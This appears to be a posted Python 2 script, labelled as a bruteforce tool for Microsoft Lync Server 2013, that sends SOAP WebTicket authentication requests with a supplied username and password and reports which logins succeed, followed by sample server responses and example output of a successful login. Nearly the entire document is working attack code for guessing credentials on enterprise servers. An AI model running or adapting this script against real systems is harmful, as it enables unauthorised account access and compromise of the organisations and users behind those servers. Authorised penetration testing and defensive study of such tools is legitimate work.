Open
Description
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Purpose: Bruteforce Lync User.
# Product: Microoft lync server 2013
# Author : Nixawk
import requests
import base64
import logging
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def lync_login(indexURI, username, password):
boolret = False
sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI
data = ''
data += '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
data += '<s:Header>'
data += '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">'
data += '<UsernameToken>'
data += '<Username>%s</Username>' % base64.b64encode(username)
data += '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % base64.b64encode(password)
data += '</UsernameToken>'
data += '</Security>'
data += '</s:Header>'
data += '<s:Body>'
data += '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">'
data += '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>'
data += '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">'
data += '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">'
data += '<Address>%s/WebTicket/WebTicketService.svc/Auth</Address>' % indexURI
data += '</EndpointReference>'
data += '</AppliesTo>'
data += '<Lifetime>'
data += '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>'
data += '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>'
data += '</Lifetime>'
data += '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>'
data += '</RequestSecurityToken>'
data += '</s:Body>'
data += '</s:Envelope>'
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "text/xml",
"SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue",
"Referer": "%s/Dialin/Conference.aspx" % indexURI,
}
try:
sess = requests.Session()
response = sess.post(sapi, headers=headers, data=data)
if response is None:
log.info("%s/%s - login failed." % (username, password))
return boolret
if response.status_code == 200 and "<RequestedSecurityToken>" in response.text:
log.info("%s/%s - login successfully !" % (username, password))
boolret = True
log.info("%s/%s - login status: %s", username, password, response.status_code)
except Exception as err:
log.exception(str(err))
return boolret
# Error Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope>
# Succe Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope>
if __name__ == '__main__':
import sys
if len(sys.argv) != 4:
print("[*] python %s <lync URI> <[email protected]> <password>" % sys.argv[0])
sys.exit(0)
# indexURI = "https://lyncpool.example.com"
indexURI = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
lync_login(indexURI, username, password)
## References
# https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources
# https://ucwa.skype.com/documentation/keytasks-createapplication
# https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa
$ python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "[email protected]/" "password"
INFO:__main__:[email protected]/password - login successfully !
INFO:__main__:[email protected]/password - login status: 200